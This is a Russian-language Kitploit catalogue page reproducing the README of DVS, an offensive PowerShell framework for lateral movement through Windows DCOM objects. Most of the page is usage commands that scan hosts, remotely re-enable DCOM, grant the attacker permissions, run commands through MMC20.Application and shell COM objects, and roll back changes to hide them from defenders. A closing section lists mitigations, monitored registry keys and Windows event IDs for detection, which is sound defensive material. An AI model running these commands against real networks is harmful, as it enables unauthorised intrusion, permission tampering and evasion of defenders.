Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DVS — D(COM) V(ulnerability) S(canner) он же Коварный швейцарский армейский нож - Боковое перемещение с использованием объектов DCOM | Kitploit
Инструменты/GitHubGitHub/scorpioneslabs/dvs
ЭксплуатацияЛатеральное перемещениеПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubscorpioneslabs/dvs

DVS

D(COM) V(ulnerability) S(canner) он же Коварный швейцарский армейский нож - Боковое перемещение с использованием объектов DCOM

Репозиторий
2564745 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

D(COM) V(ulnerability) S(canner) AKA Devious швейцарский нож - Боковое перемещение с помощью DCOM-объектов

Вы когда-нибудь задумывались, как можно перемещаться по внутренним сетям? Или взаимодействовать с удаленными машинами, не вызывая срабатывания EDR? Предположим, у нас есть действительные учетные данные или активная сессия с доступом к удаленной машине, но у нас нет возможности выполнить процесс удаленно известным, ожидаемым или сильно контролируемым способом (например, WMI, Планировщик задач, WinRM, PowerShell Remoting).

Для таких сценариев на помощь приходит фреймворк DVS.

Фреймворк DVS — это швейцарский нож, который позволяет перечислять уязвимые функции удаленных DCOM-объектов, запускать их и даже проводить атаки с их помощью.

Фреймворк разрабатывается с мышлением «Красной команды» и использует скрытные методы для компрометации удаленных машин.

Фреймворк DVS содержит различные способы обхода удаленной защиты от DCOM путем повторного включения доступа к DCOM удаленно и автоматического предоставления необходимых разрешений атакующему пользователю.

Фреймворк также может откатить изменения на удаленной машине к исходному состоянию до атаки — скрывая эти изменения от защитников.

Наше основное открытие заключается в том, что инструмент также может выполнять команды с использованием неуязвимых DCOM-объектов с помощью потрясающей техники (читайте ниже о Invoke-RegisterRemoteSchema)

Совместимо с PowerShell 2.0 и выше

Youtube Video PoC: DVS

Отказ от ответственности

Этот инструмент предназначен только для тестирования и образовательных целей. Любое другое использование этого кода запрещено. Используйте на свой страх и риск.
Автор НЕ несет ответственности за неправильное использование этого инструмента.
Используя этот инструмент, вы принимаете тот факт, что любой ущерб, причиненный использованием этого инструмента, является вашей ответственностью.

Доступ к реестру — как фреймворк DVS использует этот протокол

  • Доступ к удаленному реестру (MS-RRP)

    1. Проверка порта 445 для взаимодействия с удаленным реестром
    2. Проверка, включен ли удаленный реестр
    3. Взаимодействие с удаленным реестром
    4. Если режим AutoGrant установлен, проверка прав на запись; в противном случае проверка прав на чтение
  • Стандартный поставщик реестра (если удаленный реестр недоступен)

    1. Проверка порта 135 для взаимодействия со "Стандартным поставщиком реестра" через WMI
    2. Проверка, доступен ли StdRegProv
    3. Взаимодействие со стандартным поставщиком реестра
    4. Если режим AutoGrant установлен, проверка прав на запись; в противном случае проверка прав на чтение

Почему этот инструмент такой скрытный?

Инструмент DVS сначала проверяет, имеет ли основная учетная запись доступ к удаленной машине, выполняя следующие шаги:

  • Базовые действия

    1. Операции аутентификации (если не установлен SkipRegAuth)
      1. Если предоставлены учетные данные, создается сессия "только для сети". В противном случае используется текущая вошедшая в систему сессия.
      2. Проверка доступа к реестру.
    2. Проверка, включена ли функция DCOM
    3. Разрешение доступа к DCOM (если установлен AutoGrant), иначе — сбой
    4. Проверка, есть ли у вошедшего пользователя/предоставленного пользователя и групп, в которые он входит (через adsi/WindowsIdentity), разрешение на взаимодействие с DCOM (через запросы к удаленному реестру)
    5. Предоставление разрешений (если установлен AutoGrant), иначе — сбой
    6. Разрешение доменного имени с удаленной машины через NetBIOS поверх TCP (с помощью NetAPI32 или UDP-пакета); в случае неудачи будет попытка использовать реестр (HKLM или HKCU)
  • Invoke-DCOMObjectScan

    1. Взаимодействие с DCOM-объектами
    2. Перечисление DCOM-объекта и поиск уязвимых функций
    3. Проверка возможности эксплуатации
    4. Генерация полезных нагрузок для выполнения
    5. Получение личной информации об уязвимом DCOM-объекте
  • Get-ExecutionCommand

    1. Генерация полезных нагрузок для выполнения
  • Invoke-ExecutionCommand

    1. Попытка взаимодействия с DCOM-объектами
    2. Выполнение команд
  • Invoke-RegisterRemoteSchema

    1. Попытка взаимодействия с одним из следующих DCOM-объектов:
      • InternetExplorer.Application — COM-объект Internet Explorer
      • {D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E} — другой COM-объект, принадлежащий Internet Explorer
      • {C08AFD90-F2A1-11D1-8455-00A0C91F3880} — ShellBrowserWindow
      • {9BA05972-F6A8-11CF-A442-00A0C90A8F39} — ShellWindows
    2. Регистрация удаленной схемы (например, http://)
    3. Настройка схемы для выполнения команд из содержимого схемы
    4. Выполнение команды

Компоненты инструмента

  • Анализатор прав безопасности — анализ прав основной учетной записи на доступ к удаленному DCOM-объекту
  • Удаленное предоставление доступа — предоставление разрешений вошедшему пользователю удаленно (если они еще не были предоставлены)
  • Сканер DCOM — сканирование и анализ удаленных/локальных DCOM-объектов на наличие уязвимых функций, которые предоставляются (должны быть указаны шаблоны и имена функций) Когда инструмент обнаруживает уязвимую функцию, он проверяет, какие аргументы она принимает и может ли функция выполнять команды
  • Генератор команд DCOM — генерирует полезную нагрузку PowerShell для выполнения на удаленной машине
  • Отчет — генерирует CSV-отчет со всей информацией об уязвимом DCOM-объекте
  • Выполнение команд — выполнение команд через DCOM-объекты

Автор

  • Nimrod Levy

Лицензия

  • GPL v3

Протестированные сценарии

  • Из вне домена в домен
  • Изнутри домена на другую машину, присоединенную к домену
  • Из домена вне домена
  • Из текущей сессии на другую машину, присоединенную к домену

Протестированные операционные системы

  • Windows 7 SP1
  • Windows 8.1
  • Windows 10
  • Windows Server 2019

Благодарности

  • Спасибо Rafel Ivgi за наставничество и помощь в архитектурном мышлении инструмента.
  • Спасибо Yossi Sasi за помощь в оптимизации скрипта.
  • Спасибо Gleb Glazkov за написание раздела по смягчению и предотвращению.

Установка:

root@kitploit:~
git clone https://github.com/ScorpionesLabs/DVS
powershell -ep bypass
PS> Import-Module .\DVS.psm1
PS> Get-Help Invoke-DCOMObjectScan -Detailed  # Получить подробную информацию о команде Invoke-DCOMObjectScan
PS> Get-Help Get-ExecutionCommand -Detailed # Получить подробную информацию о команде Get-ExecutionCommand
PS> Get-Help Invoke-ExecutionCommand -Detailed # Получить подробную информацию о команде Invoke-ExecutionCommand
PS> Get-Help Invoke-RegisterRemoteSchema -Detailed # Получить подробную информацию о команде Invoke-RegisterRemoteSchema

Invoke-DCOMObjectScan

Функция Invoke-DCOMObjectScan позволяет сканировать DCOM-объекты и находить уязвимые функции с помощью списка шаблонов или точных имен функций, которые вы указали в файле.

  • Примеры:

    1. Перечисляет и сканирует объект MMC20.Application (ProgID) с машины атакующего на хост DC01 без запроса реестра.

      root@kitploit:~
         Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipRegAuth -Username "lab\administrator" -Password "Aa123456!" -Verbose
      

    Примечание: Инструмент не будет анализировать разрешения ACL, и при успешном выполнении он получит всю информацию об объекте, за исключением сведений, упомянутых в реестре (например, имя объекта, исполняемый файл и т.д.).

    1. Проверяет, доступен ли объект MMC20.Application (ProgID) с машины атакующего на хост DC01 без предварительного запроса и проверки списка доступа DCOM-объекта.

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipPermissionChecks -CheckAccessOnly -Verbose
      
    2. Проверяет, применим ли MMC20.Application (ProgID) через диапазон 10.211.55.4/24. Если он существует, инструмент попытается получить о нем информацию (используя текущую вошедшую сессию пользователя).

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -Hostlist "10.211.55.4/24" -CheckAccessOnly -Verbose
      
    3. Проверяет, существует ли и доступен ли объект с CLSID {00020812-0000-0000-C000-000000000046} через IP-адрес 10.211.55.4. Если существует, инструмент получит информацию о нем (используя учетные данные lab\administrator).

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -Type Single -ObjectName "{00020812-0000-0000-C000-000000000046}" -Hostlist "10.211.55.4" -CheckAccessOnly -Username "lab\administrator" -Password "Aa123456!" -Verbose   
      
    4. Сканирует все объекты, хранящиеся по указанному пути (например, C:\Users\USERNAME\Desktop\DVS\objects.txt), через IP-адрес 10.211.55.4, и находит список функций, расположенный в указанном файле, таком как vulnerable.txt, используя учетные данные lab\administrator со следующей конфигурацией:
      Max depth: 4
      Max results: 1 (1 результат для каждого объекта)
      Автоматическое предоставление: Если у нас нет доступа к объекту или если функция DCOM отключена, включить функцию DCOM и выполнить автоматическое предоставление прав на соответствующий DCOM-объект.
      Наконец, вернуть машину в то же состояние, что и до атаки.

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type List -ObjectListFile "C:\Users\USERNAME\Desktop\DVS\objects.txt" -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -AutoGrant -Username "lab\administrator" -Password "Aa123456!" -Hostlist "10.211.55.4" -MaxResults 1 -Verbose
      
    5. Сканирует все объекты, хранящиеся на доступных удаленных машинах из диапазона 10.211.55.1/24, и находит потенциально уязвимые функции из списка, расположенного в выбранном файле (например, C:\Users\USERNAME\Desktop\DVS\vulnerable.txt), исключая объекты из выбранного файла (например, C:\Users\USERNAME\Desktop\DVS\exclude.txt), и пропускает свойства с одинаковым именем на других маршрутах того же объекта.
      ПРИМЕЧАНИЕ: Флаг SkipSameProperyName может пропустить уязвимые функции, когда существует одно и то же имя свойства с разными настройками (методы/другие свойства) или разной цепочкой глубины.

      root@kitploit:~
         PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type All  -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -ExcludeFileList "C:\Users\USERNAME\Desktop\DVS\exclude.txt" -Hostlist "10.211.55.1/24" -SkipSameProperyName -Verbose
      

Get-ExecutionCommand

Функция Get-ExecutionCommand позволяет сгенерировать полезную нагрузку PowerShell, которая будет взаимодействовать с удаленной DCOM-функцией и выполнять ее с соответствующими параметрами.

  • Примеры:
    1. Проверяет, предоставлено ли основной учетной записи разрешение на взаимодействие с объектом CLSID {00020812-0000-0000-C000-000000000046} через IP-адрес 10.211.55.4 с использованием учетных данных lab\administrator, затем генерирует команду выполнения.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "{00020812-0000-0000-C000-000000000046}" -ObjectPath "DDEInitiate" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -Verbose
      
    2. Проверяет доступ к DCOM.
      Если у основной учетной записи нет необходимых разрешений или функция DCOM отключена, инструмент включит функцию DCOM, предоставит доступ к учетной записи и взаимодействует с объектом MMC20.Application (ProgID) через IP-адрес 10.211.55.4, используя учетные данные lab\administrator, и сгенерирует команду выполнения.
      Наконец, вернет машину в то же состояние, что и до атаки.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -AutoGrant -Verbose
      
    3. Пытается взаимодействовать с объектом MMC20.Application (ProgID) через диапазон 10.211.55.1/24, используя текущую вошедшую сессию, без анализа разрешений ACL, затем генерирует команду выполнения.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.1/24" -SkipPermissionChecks -Verbose
      
    4. Пытается взаимодействовать с объектом MMC20.Application (ProgID) через IP-адрес 10.211.55.4 без запроса реестра.

      root@kitploit:~
         PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -SkipRegAuth -Verbose
      

Invoke-ExecutionCommand

Функция Invoke-ExecutionCommand позволяет выполнять команды через DCOM-объект, используя вошедшего в систему пользователя или предоставленные учетные данные.

  • Примеры:

    1. Проверяет доступ к DCOM.
      Если у основной учетной записи нет необходимых разрешений или функция DCOM отключена, инструмент включит функцию DCOM, предоставит доступ, взаимодействует с объектом MMC20.Application (ProgID) через диапазон: 10.211.55.1/24, используя текущую сессию вошедшего пользователя, и выполнит следующие команды:

      1. Выполняет команду cmd.exe /c calc

      2. Устанавливает атрибут Frame.Top в 1 Наконец, вернет машину в то же состояние, что и до атаки.

        root@kitploit:~
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -AutoGrant -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")},@{ObjectPath="Frame.Top";Arguments=@(1)} ) -HostList "10.211.55.1/24" -Verbose
        
    2. Пытается взаимодействовать с объектом MMC20.Application (ProgID), используя учетные данные lab\administrator через IP-адрес 10.211.55.4, и выполняет следующую команду: cmd.exe /c calc.

      root@kitploit:~
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -Username "lab\administrator" -Password "Aa123456!" -Verbose
      
    3. Пытается взаимодействовать с объектом MMC20.Application (ProgID), используя текущую сессию вошедшего пользователя без анализа разрешений ACL, и выполняет следующую команду: cmd.exe /c calc.

      root@kitploit:~
         PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -SkipPermissionChecks -Verbose
      

Invoke-RegisterRemoteSchema

Функция Invoke-RegisterRemoteSchema позволяет выполнять команды через следующие DCOM-объекты, используя вошедшего в систему пользователя или предоставленные учетные данные:

  • ShellBrowserWindow
  • ShellWindows
  • Internet Explorer
  • ielowutil.exe

Примечание: Эти DCOM-объекты не требуют доступа к локальному реестру машины. Они могут закрепиться с любым пользователем, имеющим доступ к удаленной машине!

  • Примеры:
    1. Выполняет команду cmd /c calc на диапазоне 10.211.55.1/24, используя текущую вошедшую сессию, и при необходимости предоставляет привилегии.

      root@kitploit:~
         PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.1/24" -Command "cmd /c calc" -AutoGrant -Verbose
      
    2. Выполняет команду cmd /c calc на удаленной машине 10.211.55.4, используя предоставленные учетные данные.

      root@kitploit:~
         PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.4" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose
      

Будущие работы

  • Удаленный анализ и изменение правил брандмауэра

Смягчение и рекомендации

Техника MITRE: T1021.003 - Remote Services: Distributed Component Object Model

Предотвращение

  • Отключить удаленный доступ к DCOM

    • Учитывайте:
      • Сторонние приложения, зависящие от DCOM
      • Удаленное управление системой с помощью "Windows Management Instrumentation" не будет работать
      • Возможные проблемы с COM-объектами
  • Запретить удаленный доступ к реестру, если он не требуется

    Оба варианта сложно реализовать в корпоративной среде без влияния на доступность.

    Тем не менее, это может быть хорошим вариантом ужесточения для конечных точек, которым не нужно удаленное управление доменом. (например, автономные конечные точки)

  • Включить профили домена и частных сетей в брандмауэре Защитника Windows

    • Инструмент DVS обходит этот контроль безопасности, создавая правило в брандмауэре, разрешающее любое динамическое RPC-подключение.
  • Перейти на использование LAPS, чтобы уменьшить поверхность атаки. Если каждый компьютер в домене имеет разный пароль локального администратора, эта учетная запись не может быть использована для бокового перемещения.

  • Ужесточение прав доступа пользователей может предотвратить эту атаку

    • Используя объекты групповой политики, организация может удалить администраторов, пользователей и другие группы из списка и перейти к использованию специальной группы/пользователя для централизованного управления, который не входит интерактивно на другие компьютеры.

      root@kitploit:~
      [Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Access this computer from the network]
      

      В официальных руководствах по ужесточению, таких как CIS, рекомендуемая настройка [Access this computer from the network] имеет значения "Администраторы и Пользователи удаленного рабочего стола или Прошедшие проверку пользователи". Эти рекомендации уязвимы для инструмента DVS.

  • Ужесточить разрешения DCOM, удалив права администраторов из разрешений — Удаленный запуск и Удаленная активация.

    • [Computer Configuration\Windows Settings\Local Policies\Security Options\DCOM]: Ограничения запуска машин в синтаксисе дескриптора безопасности (SDDL)
  • Используйте брандмауэр на уровне хоста / брандмауэр, учитывающий приложения, чтобы блокировать DCOM-доступ между компьютерами. Особенно для компьютеров, не входящих в ИТ-инфраструктуру или инфраструктуру управления.

  • Правила контроля приложений могут использоваться как последний круг контроля безопасности, чтобы предотвратить запуск опасных дочерних процессов или загрузку DLL уязвимыми процессами.
    Примеры:

    root@kitploit:~
    mmc.exe -> cmd.exe
    explorer.exe -> regsvr.exe
    visio.exe -> wmic.exe
    excel.exe -> Rundll32.exe
    outlook.exe -> cmd.exe
    
  • Правила уменьшения поверхности атаки Microsoft можно использовать для предотвращения запуска опасных дочерних процессов уязвимыми процессами.

Обнаружение

  • Отслеживайте изменения в реестре в следующих местах:

    root@kitploit:~
       [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
    

    Этот ключ является настройкой разрешений DCOM. Если они изменены, это может означать, что злоумышленник, использовавший инструмент DVS, снял ужесточение.

    root@kitploit:~
      [HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
    

    "Подразделы и значения реестра, связанные с ключом [HKEY_LOCAL_MACHINE\SOFTWARE\Classes], содержат информацию о приложении, необходимую для поддержки функциональности COM. Эта информация включает такие темы, как поддерживаемые форматы данных, информация о совместимости, программные идентификаторы, DCOM и элементы управления." Справка центра разработки Microsoft

    root@kitploit:~
      [MACHINE\SOFTWARE\policies\Microsoft\windows NT\DCOM\MachineLaunchRestriction]
    

    Изменение этого ключа может указывать на то, что инструмент DVS отключил ограничения удаленной активации и удаленного запуска DCOM.

  • Используйте брандмауэр, учитывающий приложения, чтобы блокировать DCOM-доступ между компьютерами. Особенно для компьютеров, не входящих в ИТ-инфраструктуру или инфраструктуру управления.

  • Система предотвращения вторжений (например, Snort, Suricata) может использоваться для обнаружения протокола DCOM, основанного на RPC (MS-RPC, MS-RPCE) и протоколе удаленного реестра (MS-RRP).

    • Возможное правило Snort
  • Отслеживайте брандмауэр Защитника Windows, включив журнал аудита заблокированного трафика для профилей домена и частных сетей.

  • Отслеживайте изменения следующего ключа. Это может указывать на то, что инструмент DVS создал правило для обхода ограничений динамического RPC в брандмауэре Защитника Windows.

    root@kitploit:~
      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
    
  • Отслеживайте журналы событий Windows:Включить аудит событий. Настройки аудита, которые следует включить для успеха и неудачи:
    Аудит событий входа в систему учетных записей | Аудит событий входа | Аудит доступа к объектам | Аудит NTLM

Перейдите к следующему разделу реестра: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
Создайте новые DWORD со значением '1' с именами ActivationFailureLoggingLevel | CallFailureLoggingLevel | InvalidSecurityDescriptorLoggingLevel

  • 4624 (Успешный вход) - Синяя команда может создать корреляцию событий для обнаружения подключений с удаленных машин к DCOM. Пример:
    • ID события 4624 - Вход
    • Имя учетной записи: SYSTEM
    • Имя процесса: C:\Windows\System32\services.exe
  • 4680 (Неизвестный пользователь или неверный пароль) - Возникает при использовании неправильного пользователя или пароля
  • 4688 (Создание процесса) - Отслеживайте уязвимые процессы, которые создают опасные дочерние процессы с использованием административного пользователя. Пример:
    • Имя процесса-создателя: C:\Windows\System32\mmc.exe -> Имя нового процесса: C:\Windows\System32\cmd.exe
    • Имя процесса-создателя: C:\Windows\System32\svchost.exe -> Имя нового процесса: C:\Windows\System32\mmc.exe
  • 8002 (NTLM) - Аудит входящего NTLM-трафика, который был бы заблокирован. Пример:
    • Имя вызывающего процесса: C:\Windows\System32\mmc.exe
    • Идентификатор пользователя вызывающего процесса: USER
    • Идентификатор домена вызывающего процесса: DOMAIN
  • 8003 (NTLM) - Аудит NTLM-аутентификации в этом домене. Пример:
    • Пользователь: User
    • Домен: DOMAIN
    • Рабочая станция: ATTACKER
    • Процесс: C:\Windows\System32\mmc.exe / C:\Windows\System32\dllhost.exe / C:\Windows\System32\svchost.exe / C:\Program Files\Internet Explorer\iexplore.exe
    • Тип входа: 3
  • 10010 (Microsoft-Windows-DistributedCOM) - Сервер %1 не зарегистрировался в DCOM в течение требуемого времени ожидания.
  • 10014 (Microsoft-Windows-DistributedCOM) - для неудачной активации CLSID из-за отключенных настроек удаленной активации для COM+.
  • 10015 (Microsoft-Windows-DistributedCOM) - неудачное выполнение DCOM из-за недостаточных разрешений.
  • 10016 (Microsoft-Windows-DistributedCOM) - неудачное выполнение DCOM из-за недостаточных разрешений. Пример:
    • Настройки разрешений по умолчанию для компьютера не предоставляют разрешение на локальную активацию для приложения COM-сервера с CLSID
      {C2F03A33-21F5-47FA-B4BB-156362A2F239} и APPID
      {316CDED5-E4AE-4B15-9113-7055D84DCC97} пользователю DOMAIN\Scorpiones
  • 10021 (Microsoft-Windows-DistributedCOM) - Дескриптор безопасности запуска и активации для приложения COM-сервера с APPID {0000000} недействителен.
Скачать инструмент